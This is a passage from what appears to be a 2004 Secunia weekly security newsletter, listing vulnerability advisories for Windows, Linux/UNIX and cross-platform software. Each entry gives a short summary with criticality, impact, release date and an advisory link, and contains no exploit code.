a vulnerable system. The vendor has issued patches, which can be found in the referenced Secunia advisory below. References: http://secunia.com/SA13586/ VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA13482] Internet Explorer DHTML Edit ActiveX Control Cross-Site Scripting 2. [SA13481] PHP Multiple Vulnerabilities 3. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability 4. [SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities 5. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability 6. [SA12889] Microsoft Internet Explorer Two Vulnerabilities 7. [SA13239] phpBB Multiple Vulnerabilities 8. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability 9. [SA13269] Winamp "IN_CDDA.dll" Buffer Overflow Vulnerability 10. [SA13474] Adobe Acrobat Reader "mailListIsPdf()" Function Buffer Overflow ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA13621] SurgeMail Unspecified Webmail Security Issue [SA13583] Crystal FTP Client "LIST" Buffer Overflow Vulnerability [SA13571] ArGoSoft Mail Server Script Insertion Vulnerability [SA13618] Citrix Metaframe XP Unspecified Buffer Overflow Vulnerability [SA13605] tlen URL Script Insertion Vulnerability [SA13591] WinRAR Delete File Buffer Overflow Vulnerability [SA13578] Windows Media Player ActiveX Control Two Vulnerabilities [SA13567] Google Desktop Search Exposure of Local Search Results [SA13569] GamePort Two Security Bypass Vulnerabilities UNIX/Linux: [SA13639] Red Hat update for acroread [SA13636] KDE kpdf "doImage()" Buffer Overflow Vulnerability [SA13629] Fedora update for libtiff [SA13626] Mandrake update for kdelibs [SA13622] Mandrake update for mplayer [SA13614] Red Hat update for PHP [SA13611] Fedora update for PHP [SA13608] HP-UX FTP Server Debug Logging Buffer 
Overflow Vulnerability [SA13607] LibTIFF Two Integer Overflow Vulnerabilities [SA13602] xpdf "doImage()" Buffer Overflow Vulnerability [SA13595] Red Hat update for XFree86 [SA13590] Mandrake update for ethereal [SA13586] KDE Konqueror Java Sandbox Security Bypass Vulnerabilities [SA13585] Gentoo update for mplayer [SA13581] Red Hat update for XFree86 [SA13568] Mandrake update for php [SA13562] Gentoo update for PHP [SA13561] Gentoo update for Ethereal [SA13559] Gentoo update for KDE kfax [SA13557] Gentoo update for phpMyAdmin [SA13542] NapShare "auto_filter_extern()" Function Buffer Overflow Vulnerability [SA13533] Bolthole Filter "save_embedded_address()" Function Buffer Overflow [SA13502] xine-lib "open_aiff_file()" Buffer Overflow Vulnerability [SA13499] Gentoo update for acroread [SA13635] Rpm Finder "web()" Buffer Overflow and Insecure File Creation [SA13624] Mandrake update for krb5 [SA13616] Gentoo update for mpg123 [SA13606] Gentoo update for Zwiki [SA13584] Debian update for xzgv [SA13580] Debian update for htget [SA13579] htget Buffer Overflow Vulnerability [SA13560] Gentoo update for kdelibs / kdebase [SA13558] Gentoo update for abcm2ps [SA13554] YAMT "id3tag_sort()" Function Vulnerability [SA13553] xlreader "book_format_sql()" Buffer Overflow Vulnerability [SA13552] Vilistextum "get_attr()" Buffer Overflow Vulnerability [SA13551] vb2c "parse()" Buffer Overflow Vulnerability [SA13550] UnRTF "process_font_table()" Buffer Overflow Vulnerability [SA13548] rtf2latex2e "ReadFontTbl()" Buffer Overflow Vulnerability [SA13547] Ringtone Tools "parse_emelody()" Function Buffer Overflow [SA13546] pgn2web "process_moves()" Buffer Overflow Vulnerability [SA13545] Pcal "getline()" and "get_holiday()" Buffer Overflow Vulnerabilities [SA13544] o3read "parse_html()" Function Buffer Overflow Vulnerability [SA13541] Mesh Viewer "Mesh::type()" Function Buffer Overflow Vulnerability [SA13539] Junkie FTP Client Two Vulnerabilities [SA13538] jpegtoavi "get_file_list_stdin()" 
Function Buffer Overflow Vulnerability [SA13537] jcabc2ps "switch_voice()" Buffer Overflow Vulnerability [SA13536] IglooFTP File Manipulation Vulnerabilities [SA13535] html2hdml "remove_quote()" Buffer Overflow Vulnerability [SA13534] GREED "DownloadLoop()" Function Vulnerabilities [SA13532] DXFscope DXF File Parsing Buffer Overflow Vulnerability [SA13531] csv2xml "get_field_headers()" Buffer Overflow Vulnerability [SA13530] Convex 3D "readObjectChunk()" Buffer Overflow Vulnerability [SA13529] chbg "simplify_path()" Buffer Overflow Vulnerability [SA13527] libbsb "bsb_open_header()" Buffer Overflow Vulnerability [SA13526] asp2php Two Buffer Overflow Vulnerabilities [SA13525] abctab2ps Two Buffer Overflow Vulnerabilities [SA13524] abcpp "handle_directive()" Buffer Overflow Vulnerability [SA13523] abcm2ps "put_words()" Buffer Overflow Vulnerability [SA13522] abc2mtex "process_abc()" Buffer Overflow Vulnerability [SA13520] Red Hat update for gd [SA13517] SUSE update for file/phprojekt [SA13516] tnftp File Name Verification Vulnerability [SA13514] qwik-smtpd "HELO" Command Buffer Overflow Vulnerability [SA13512] abc2midi Two Buffer Overflow Vulnerabilities [SA13511] mpg123 "find_next_file()" Buffer Overflow Vulnerability [SA13506] Red Hat update for libxml [SA13497] Sun Java Messaging Server Webmail Script Insertion Vulnerability [SA13623] SUSE update for samba [SA13615] Fedora update for samba [SA13613] Red Hat update for samba [SA13612] Fedora update for krb5 [SA13597] Red Hat update for nfs-utils [SA13592] Kerberos V5 "libkadm5srv" Buffer Overflow Vulnerability [SA13582] Trustix update for samba [SA13573] Fedora update for CUPS [SA13570] Gentoo update for Samba [SA13540] LinPopUp "strexpand()" Function Buffer Overflow Vulnerability [SA13510] CUPS hpgltops and lppasswd Vulnerabilities [SA13507] Red Hat update for samba [SA13601] Fedora update for namazu [SA13600] Namazu "namazu.cgi" Cross-Site Scripting Vulnerability [SA13588] Mandrake update for aspell [SA13587] 
Gentoo update for nasm [SA13556] Email Sanitizer Unspecified MIME Denial of Service Vulnerability [SA13543] NASM "error()" Function Buffer Overflow Vulnerability [SA13610] SuSE update for kernel [SA13642] Docbook-to-Man Insecure Temporary File Creation [SA13640] LPRng "lprng_certs.sh" Script Insecure Temporary File Creation [SA13633] Debian debmake Insecure Temporary Directory Creation [SA13598] Red Hat update for rh-postgresql [SA13594] Red Hat update for glibc [SA13589] IBM AIX Multiple Privilege Escalation Vulnerabilities [SA13575] Debian update for ethereal [SA13572] Linux Kernel Multiple Vulnerabilities [SA13565] HP-UX newgrp Privilege Escalation Vulnerability [SA13528] changepassword Privilege Escalation Vulnerability [SA13521] Debian update for cscope [SA13519] Debian update for a2ps [SA13505] Red Hat update for zip [SA13503] Gentoo update for cscope [SA13501] NetBSD "compat" Privilege Escalation Vulnerabilities [SA13498] Gentoo update for vim/gvim [SA13625] Mandrake update for logcheck [SA13617] SUSE update for ncpfs [SA13549] uml-utilities Ethernet Connection Drop Security Issue Other: Cross Platform: [SA13632] Sybase ASE Three Unspecified Vulnerabilities [SA13508] MPlayer Multiple Vulnerabilities [SA13620] 2Bgal "id_album" SQL Injection Vulnerability [SA13564] IMG2ASCII Unspecified Vulnerability [SA13563] Kayako eSupport Cross-Site Scripting and SQL Injection [SA13555] Yanf "get()" Buffer Overflow Vulnerability [SA13518] Cosminexus Web Contents Generator Buffer Overflow Vulnerability [SA13515] Moodle Multiple Unspecified Security Issues [SA13513] Ikonboard "st" and "keywords" SQL Injection Vulnerability [SA13500] AtBas 2fax "expandtabs()" Buffer Overflow Vulnerability [SA13619] PsychoStats "login" Cross-Site Scripting Vulnerability [SA13576] PHPFormMail "output_html()" Cross-Site Scripting Vulnerabilities [SA13574] PHP-Nuke Workboard Module Cross-Site Scripting [SA13566] PERL Crypt::ECB Module ASCII "0" Encoding Security Issue [SA13504] 68 Designs Froogle 
Installation Security Issue [SA13593] Symantec Brightmail AntiSpam Notifier Denial of Service ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13621] SurgeMail Unspecified Webmail Security Issue Critical: Moderately critical Where: From remote Impact: Unknown Released: 2004-12-23 A security issue with an unknown impact has been reported in SurgeMail. Full Advisory: http://secunia.com/advisories/13621/ -- [SA13583] Crystal FTP Client "LIST" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Luca Ercoli has discovered a vulnerability in Crystal FTP, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13583/ -- [SA13571] ArGoSoft Mail Server Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-20 A vulnerability has been reported in ArGoSoft Mail Server, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13571/ -- [SA13618] Citrix Metaframe XP Unspecified Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-22 A vulnerability has been reported in Citrix Metaframe XP, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13618/ -- [SA13605] tlen URL Script Insertion Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-21 A vulnerability has been reported in tlen, allowing malicious people to inject arbitrary script code. 
Full Advisory:
http://secunia.com/advisories/13605/

--

[SA13591] WinRAR Delete File Buffer Overflow Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2004-12-22

Vafa Khoshaein has discovered a vulnerability in WinRAR, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13591/

--

[SA13578] Windows Media Player ActiveX Control Two Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data, Exposure of system information, Exposure of sensitive information
Released:    2004-12-20

Arman Nayyeri has discovered two vulnerabilities in Microsoft Windows Media Player, which can be exploited by malicious people to disclose system information, and modify or disclose some sensitive information.

Full Advisory:
http://secunia.com/advisories/13578/

--

[SA13567] Google Desktop Search Exposure of Local Search Results

Critical:    Less critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2004-12-21

A vulnerability has been reported in Google Desktop Search, which can be exploited by malicious people to view local search results.

Full Advisory:
http://secunia.com/advisories/13567/

--

[SA13569] GamePort Two Security Bypass Vulnerabilities

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass
Released:    2004-12-21

amoXi and Dr.vaXin have discovered two security issues in GamePort, which can be exploited by malicious, local users to bypass some security restrictions.

Full Advisory:
http://secunia.com/advisories/13569/

UNIX/Linux:--

[SA13639] Red Hat update for acroread

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-23

Red Hat has issued an update for acroread. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13639/

--

[SA13636] KDE kpdf "doImage()" Buffer Overflow Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-23

The vendor has acknowledged a vulnerability in kpdf, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13636/

--

[SA13629] Fedora update for libtiff

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-23

Fedora has issued an update for libtiff. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13629/

--

[SA13626] Mandrake update for kdelibs

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-23

MandrakeSoft has issued an update for kdelibs. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13626/

--

[SA13622] Mandrake update for mplayer

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-23

MandrakeSoft has issued an update for mplayer. This fixes multiple vulnerabilities, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13622/

--

[SA13614] Red Hat update for PHP

Critical:    Highly critical
Where:       From remote
Impact:      System access, DoS, Privilege escalation, Security Bypass
Released:    2004-12-22

Red Hat has issued an update for PHP. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13614/

--

[SA13611] Fedora update for PHP

Critical:    Highly critical
Where:       From remote
Impact:      System access, DoS, Privilege escalation, Security Bypass
Released:    2004-12-22

Fedora has issued an update for PHP. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13611/

--

[SA13608] HP-UX FTP Server Debug Logging Buffer Overflow Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-22

iDEFENSE has reported a vulnerability in HP-UX, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13608/

--

[SA13607] LibTIFF Two Integer Overflow Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-22

infamous41md has reported two vulnerabilities in LibTIFF, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13607/

--

[SA13602] xpdf "doImage()" Buffer Overflow Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-22

A vulnerability has been reported in xpdf, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13602/

--

[SA13595] Red Hat update for XFree86

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2004-12-21

Red Hat has issued an update for XFree86. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13595/

--

[SA13590] Mandrake update for ethereal

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2004-12-21

MandrakeSoft has issued an update for ethereal. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13590/

--

[SA13586] KDE Konqueror Java Sandbox Security Bypass Vulnerabilities

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Two vulnerabilities have been reported in KDE Konqueror, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13586/

--

[SA13585] Gentoo update for mplayer

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-21

Gentoo has issued an update for mplayer. This fixes multiple vulnerabilities, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13585/

--

[SA13581] Red Hat update for XFree86

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2004-12-20

Red Hat has issued an update for xfree86. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13581/

--

[SA13568] Mandrake update for php

Critical:    Highly critical
Where:       From remote
Impact:      Security Bypass, Exposure of sensitive information, Privilege escalation, System access
Released:    2004-12-20

Mandrakesoft has issued an update for php. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13568/

--

[SA13562] Gentoo update for PHP

Critical:    Highly critical
Where:       From remote
Impact:      System access, Privilege escalation, Exposure of sensitive information, Security Bypass
Released:    2004-12-20

Gentoo has issued an update for PHP. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13562/

--

[SA13561] Gentoo update for Ethereal

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2004-12-20

Gentoo has issued an update for Ethereal. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13561/

--

[SA13559] Gentoo update for KDE kfax

Critical:    Highly critical
Where:       From remote
Impact:      DoS, System access
Released:    2004-12-20

Gentoo has issued an update for KDE kfax. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13559/

--

[SA13557] Gentoo update for phpMyAdmin

Critical:    Highly critical
Where:       From remote
Impact:      System access, Exposure of sensitive information
Released:    2004-12-20

Gentoo has issued an update for phpMyAdmin. This fixes two vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system and by malicious users to disclose sensitive information.
Full Advisory:
http://secunia.com/advisories/13557/

--

[SA13542] NapShare "auto_filter_extern()" Function Buffer Overflow Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Bartlomiej Sieka has reported a vulnerability in NapShare, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13542/

--

[SA13533] Bolthole Filter "save_embedded_address()" Function Buffer Overflow

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Ariel Berkman has reported a vulnerability in filter, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13533/

--

[SA13502] xine-lib "open_aiff_file()" Buffer Overflow Vulnerability

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Ariel Berkman has reported a vulnerability in xine-lib, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13502/

--

[SA13499] Gentoo update for acroread

Critical:    Highly critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Gentoo has issued an update for acroread. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13499/

--

[SA13635] Rpm Finder "web()" Buffer Overflow and Insecure File Creation

Critical:    Moderately critical
Where:       From remote
Impact:      Privilege escalation, System access
Released:    2004-12-23

Two vulnerabilities have been reported in Rpm Finder, which can be exploited by malicious people to compromise a user's system and by malicious, local users to perform certain actions with escalated privileges.
Full Advisory:
http://secunia.com/advisories/13635/

--

[SA13624] Mandrake update for krb5

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-23

Mandrake has issued an update for krb5. This fixes a vulnerability, which potentially can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13624/

--

[SA13616] Gentoo update for mpg123

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-22

Gentoo has issued an update for mpg123. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13616/

--

[SA13606] Gentoo update for Zwiki

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2004-12-22

Gentoo has issued an update for Zwiki. This fixes a vulnerability, which can be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/13606/

--

[SA13584] Debian update for xzgv

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-21

Debian has issued an update for xzgv. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13584/

--

[SA13580] Debian update for htget

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Debian has issued an update for htget. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13580/

--

[SA13579] htget Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

infamous41md has reported a vulnerability in htget, which can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13579/

--

[SA13560] Gentoo update for kdelibs / kdebase

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information, Spoofing
Released:    2004-12-20

Gentoo has issued updates for kdebase and kdelibs. These fix some vulnerabilities, which can be exploited by malicious people to spoof the content of websites.

Full Advisory:
http://secunia.com/advisories/13560/

--

[SA13558] Gentoo update for abcm2ps

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Gentoo has issued an update for abcm2ps. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13558/

--

[SA13554] YAMT "id3tag_sort()" Function Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Manigandan Radhakrishnan has reported a vulnerability in YAMT, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13554/

--

[SA13553] xlreader "book_format_sql()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Tom Palarz and Kris Kubicki have reported a vulnerability in xlreader, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13553/

--

[SA13552] Vilistextum "get_attr()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Ariel Berkman has reported a vulnerability in Vilistextum, which can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13552/

--

[SA13551] vb2c "parse()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Qiao Zhang has reported a vulnerability in vb2c, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13551/

--

[SA13550] UnRTF "process_font_table()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Yosef Klein and Limin Wang have reported a vulnerability in UnRTF, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13550/

--

[SA13548] rtf2latex2e "ReadFontTbl()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Limin Wang has reported a vulnerability in rtf2latex2e, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13548/

--

[SA13547] Ringtone Tools "parse_emelody()" Function Buffer Overflow

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Qiao Zhang has reported a vulnerability in Ringtone Tools, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13547/

--

[SA13546] pgn2web "process_moves()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

A vulnerability has been reported in pgn2web, allowing malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13546/

--

[SA13545] Pcal "getline()" and "get_holiday()" Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Danny Lungstrom has reported two vulnerabilities in Pcal, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13545/

--

[SA13544] o3read "parse_html()" Function Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Wiktor Kopec has reported a vulnerability in o3read, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13544/

--

[SA13541] Mesh Viewer "Mesh::type()" Function Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Mohammed Khan and Danny Lungstrom have reported a vulnerability in Mesh Viewer, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13541/

--

[SA13539] Junkie FTP Client Two Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data, System access
Released:    2004-12-20

Yosef Klein has reported two vulnerabilities in Junkie, which can be exploited by malicious people to manipulate files or compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13539/

--

[SA13538] jpegtoavi "get_file_list_stdin()" Function Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

James Longstreet has reported a vulnerability in jpegtoavi, which can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13538/

--

[SA13537] jcabc2ps "switch_voice()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

A vulnerability has been reported in jcabc2ps, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13537/

--

[SA13536] IglooFTP File Manipulation Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2004-12-20

Two vulnerabilities have been reported in IglooFTP, which can be exploited to substitute uploaded files or overwrite files on the user's system.

Full Advisory:
http://secunia.com/advisories/13536/

--

[SA13535] html2hdml "remove_quote()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

A vulnerability has been reported in html2hdml, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13535/

--

[SA13534] GREED "DownloadLoop()" Function Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Manigandan Radhakrishnan has reported two vulnerabilities in GREED, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13534/

--

[SA13532] DXFscope DXF File Parsing Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-20

Ariel Berkman has reported a vulnerability in DXFscope, which can be exploited by malicious people to compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13532/

--

[SA13531] csv2xml "get_field_headers()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Limin Wang has reported a vulnerability in csv2xml, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13531/

--

[SA13530] Convex 3D "readObjectChunk()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Ariel Berkman has reported a vulnerability in Convex 3D, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13530/

--

[SA13529] chbg "simplify_path()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Danny Lungstrom has reported a vulnerability in chbg, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13529/

--

[SA13527] libbsb "bsb_open_header()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

A vulnerability has been reported in libbsb, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13527/

--

[SA13526] asp2php Two Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Qiao Zhang has reported two vulnerabilities in asp2php, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13526/

--

[SA13525] abctab2ps Two Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Limin Wang has reported two vulnerabilities in abctab2ps, allowing malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13525/

--

[SA13524] abcpp "handle_directive()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Yosef Klein has reported a vulnerability in abcpp, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13524/

--

[SA13523] abcm2ps "put_words()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Limin Wang has reported a vulnerability in abcm2ps, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13523/

--

[SA13522] abc2mtex "process_abc()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Limin Wang has reported a vulnerability in abc2mtex, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13522/

--

[SA13520] Red Hat update for gd

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Red Hat has issued an update for gd. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13520/

--

[SA13517] SUSE update for file/phprojekt

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass, System access
Released:    2004-12-17

SUSE has issued updates for file and phprojekt. These fix two vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions or potentially compromise a user's system.
Full Advisory:
http://secunia.com/advisories/13517/

--

[SA13516] tnftp File Name Verification Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data, System access
Released:    2004-12-17

Yosef Klein has reported a vulnerability in tnftp, allowing malicious people to overwrite local files.

Full Advisory:
http://secunia.com/advisories/13516/

--

[SA13514] qwik-smtpd "HELO" Command Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Security Bypass
Released:    2004-12-17

Jonathan Rockway has reported a vulnerability in qwik-smtpd, which can be exploited by malicious people to relay mail.

Full Advisory:
http://secunia.com/advisories/13514/

--

[SA13512] abc2midi Two Buffer Overflow Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Limin Wang has reported two vulnerabilities in abc2midi, allowing malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/13512/

--

[SA13511] mpg123 "find_next_file()" Buffer Overflow Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Bartlomiej Sieka has reported a vulnerability in mpg123, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/13511/

--

[SA13506] Red Hat update for libxml

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2004-12-17

Red Hat has issued an update for libxml. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/13506/

--

[SA13497] Sun Java Messaging Server Webmail Script Insertion Vulnerability

Critical:    Moderately critical
